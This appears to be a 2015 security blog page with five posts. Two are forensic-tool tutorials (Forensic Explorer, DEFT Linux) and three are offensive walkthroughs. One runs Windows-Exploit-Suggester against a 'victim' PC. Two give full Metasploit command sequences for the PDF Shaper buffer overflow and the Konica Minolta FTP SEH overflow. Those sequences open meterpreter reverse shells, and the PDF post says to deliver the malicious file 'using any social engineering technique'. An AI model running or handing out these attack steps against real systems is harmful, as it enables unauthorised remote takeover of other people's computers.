Forensic Investigation of RAW Image using Forensics Explorer (Part 1)

at 1:03 AM Sunday, September 27, 2015 0 comments
Forensic Explorer is a tool for the analysis of electronic evidence. Primary users of this software are law enforcement, corporate investigations agencies and law firms. Forensic Explorer has the features you expect from the very latest in forensic software. Inclusive with Mount Image Pro, Forensic Explorer will quickly become an important part of your forensic software toolkit.

It enables investigators to:

·         Manage the analysis of large volumes of information from multiple sources in a case file structure;
·         Access and examine all available data, including hidden and system files, deleted files, file and disk slack and unallocated clusters;
·         Automate complex investigation tasks;
·         Produce detailed reports; and,
·         Provide non forensic investigators a platform to easily review evidence.

Supported File Formats

Forensics Explorer supports the analysis of the following file formats:

·         Apple DMG
·         DD or RAW;
·         EnCase® (.E01, .L01, Ex01);
·         Forensic File Format .AFF
·         FTK® (.E01, .AD1 formats);
·         ISO (CD and DVD image files);
·         Microsoft VHD
·         NUIX File Safe MFS01
·         ProDiscover®
·         SMART®
·         VMWare®
·         XWays E01 and CTR


First Download Forensics Explorer From here and install in your pc. And Click on New Option


Enter the Case Name and click on new option in Investigator TAB


Here in next step you have to enter the FULL NAME, TITLE, and Organization, Department and email details and click on ok to proceed to next step.


Select the cases folder where Forensic Evidence will be created. And click on ok


Now Click ‘Add Image.


Now select the path of RAW Image. To create RAW Image Select the given LINK.

http://www.hackingarticles.in/how-to-create-copy-of-suspects-evidence-using-ftk-imager/


Now Select tasks to be processed on RAW image   from given list and click on Start.


After Process completion, it will show Result for all the tasks selected earlier.


Now Click on File System. The File System module is the primary Forensic Explorer window where actions such as highlighting, selecting, sorting, filtering, flagging, exporting and opening occur.


 Select Registry analysis: Open and examine Windows registry hives. Filter, categorize and keyword search registry keys. Automate registry analysis with RegEx scripts.


Bookmark selection enables almost any item (e.g. file, folder, keyword, search hit, etc.), or a selection from an item (e.g. a fragment of text from a file or unallocated clusters), to be bookmarked and listed in the Bookmarks module. 


Reports: The purpose of the Reports Module is to assist in the generation of a report that documents the forensic analysis. The Reports module is based on the use of templates that can be re-used across multiple investigations.

Labels:

How to Show all Possible Exploits in Victim PC using Windows-Exploit-Suggester

at 11:55 PM Friday, September 25, 2015 0 comments
This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.

It requires the 'systeminfo' command output from a Windows host in order to compare that the Microsoft security bulletin database and determine the patch level of the host.

It has the ability to automatically download the security bulletin database from Microsoft with the --update flag, and saves it as an Excel spreadsheet.


First Download windows exploit suggester from here and unzip in your pc


Now to update the script using
 ./windows-exploit-suggester.py --update


Now download xlrd-0.9.4 from here and install in your pc using

./setup.py install  ( which is prerequisite)


Now run systeminfo command in windows prompt and save the resultant file on the Desktop as
Win7-ultimate.txt.


Now copy File Win7-ultimate.txt in Windows-Exploit-Suggester-master folder on Kali Linux as shown below.


Now run the following command & you will get the result.

./windows-exploit-suggester.py --database 2015-09-25-mssb.xlsx --systeminfo win7-ultimate-systeminfo.txt

Now it will show all possible exploits for an operating system Victim windows PC.


Labels: ,

Forensic Investigation Tutorial Using DEFT

at 2:40 AM 0 comments
DEFT (acronym for Digital Evidence & Forensics Toolkit) is a distribution made for Computer Forensics, with the purpose of running live on systems without tampering or corrupting devices (hard disks, pen drives, etc…) connected to the PC where the boot process takes place.

The DEFT system is based on GNU Linux; it can run live (via DVDROM or USB pen drive), installed or run as a Virtual Appliance on VMware or Virtual box. DEFT employs LXDE as desktop environment and WINE for executing Windows tools under Linux. It features a comfortable mount manager for device management.

First Download ISO image of deft Linux from here


After having started the DEFT boot loader, you will see a screen with several boot options. Now click on Install DEFT Linux 8


Now click on continue


Now Select the third party software option and click on continue.


Now it will ask the option to install Kubuntu.
Select Guided-use entire disk and click on install now


Now select your time zone and click ok


Now fill your personal Details and select Continue. Click on Restart Now.



Analysis - Analysis Tools files of different types


Antimalware - Search for root kits, viruses, malware and malicious PDFs.


Data Recovery - File Recovery Software


Hashing - Scripts that allow the realization of calculating hashes of certain processes (SHA1, SHA256, MD5 ...)


Imaging - Applications that we can use to make cloned and imaging of hard drives or other sources.


Mobile Forensics - Analysis Blackberry, Android, iPhone, as well as information about typical databases SQLite mobile devices used by applications.


Network Forensics - Tools for processing information stored in network


OSINT - Applications that facilitate obtaining information associated with users and their activity.


Password recovery - Recovery BIOS passwords, compressed files, office, brute force, etc.


Reporting tools - Finally, within this section you will find tools that will facilitate the task of reporting and obtaining evidence that will serve to document forensics. Screen capture, collection of notes, desktop activity log, etc.


Labels:

Hack Remote Windows PC using PDF Shaper Buffer Overflow

at 1:43 AM Monday, September 21, 2015 0 comments
PDF Shaper is prone to security vulnerability when processing PDF files. The vulnerability appear when we use Convert PDF to Image and use a specially crafted PDF file. This Metasploit module has been tested successfully on Win Xp, Win 7, Win 8, and Win 10.

Exploit Targets
PDF Shaper

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/windows/fileformat/pdf_shaper_bof
msf exploit (pdf_shaper_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (pdf_shaper_bof)>set lhost 192.168.1.16 (IP of Local Host)
msf exploit (pdf_shaper_bof)>exploit  


After we successfully generate the malicious pdf File, it will stored on your local computer
/root/.msf4/local/msf.pdf


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.16
exploit

Now send your msf.pdf files to victim using any social engineering technique. Now when the victim will use PDF Shaper tool and click on PDF to Image option


Now it will show Add File Option, victim will select the msf.pdf and click on Convert option.




Now you will get the meterpreter of victim PC.

Labels: ,

Hack Remote Windows PC using Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow

at 11:32 AM Saturday, September 19, 2015 0 comments
This module exploits an SEH overflow in Konica Minolta FTP Server 1.00. Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which leads to an SEH overflow. Konica FTP allows anonymous access by default; valid credentials are typically unnecessary to exploit this vulnerability.

Exploit Targets
Konica Minolta FTP Server 1.00

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/windows/ftp/kmftp_utility_cwd
msf exploit (kmftp_utility_cwd)>set payload windows/meterpreter/reverse_tcp
msf exploit (kmftp_utility_cwd)>set lhost 192.168.1.5 (IP of Local Host)
msf exploit (kmftp_utility_cwd)>set rhost 192.168.1.7
msf exploit (kmftp_utility_cwd)>set FTPUSER anonymous
msf exploit (kmftp_utility_cwd)>set FTPPASS raj
msf exploit (kmftp_utility_cwd)>exploit


Labels: ,
Subscribe to: Comments (Atom)